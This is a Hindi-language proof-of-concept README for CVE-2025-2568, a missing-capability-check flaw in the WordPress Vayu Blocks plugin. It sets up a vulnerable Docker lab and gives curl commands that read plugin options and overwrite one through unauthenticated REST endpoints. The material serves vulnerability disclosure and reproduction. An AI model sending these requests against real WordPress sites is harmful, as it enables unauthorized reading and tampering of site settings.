
CVE-2025-2568 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो क्षमता जांच (capability checks) की कमी के माध्यम से WordPress Vayu Blocks प्लगइन विकल्पों तक अनधिकृत पहुंच और संशोधन को प्रदर्शित करता है।
WordPress और WooCommerce के लिए Vayu Blocks – Gutenberg Blocks प्लगइन, WordPress के लिए, संस्करण 1.0.4 से 1.2.1 में vayu_blocks_get_toggle_switch_values_callback और vayu_blocks_save_toggle_switch_callback फ़ंक्शन में क्षमता जांच की कमी के कारण अनधिकृत पहुंच और डेटा के संशोधन के प्रति संवेदनशील है। यह बिना प्रमाणीकरण वाले हमलावरों के लिए प्लगइन विकल्पों को पढ़ना और _value में समाप्त होने वाले कुंजी नाम वाले किसी भी विकल्प को अपडेट करना संभव बनाता है।
cd vuln-wordpress
docker-compose up -d
cd wp-content/plugins/
unzip vayu-blocks.1.2.0.zip
curl http://localhost:8080/wp-json/vayu-blocks/v1/get-toggle-values/
curl -X POST http://localhost:8080/wp-json/vayu-blocks/v1/save-toggle-switch \
-H "Content-Type: application/json" \
-d '{"key":"container", "value":"new_value"}'